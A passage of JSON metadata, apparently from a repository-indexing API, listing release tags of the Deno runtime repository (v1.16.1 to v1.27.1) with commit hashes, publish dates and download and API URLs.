d/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:g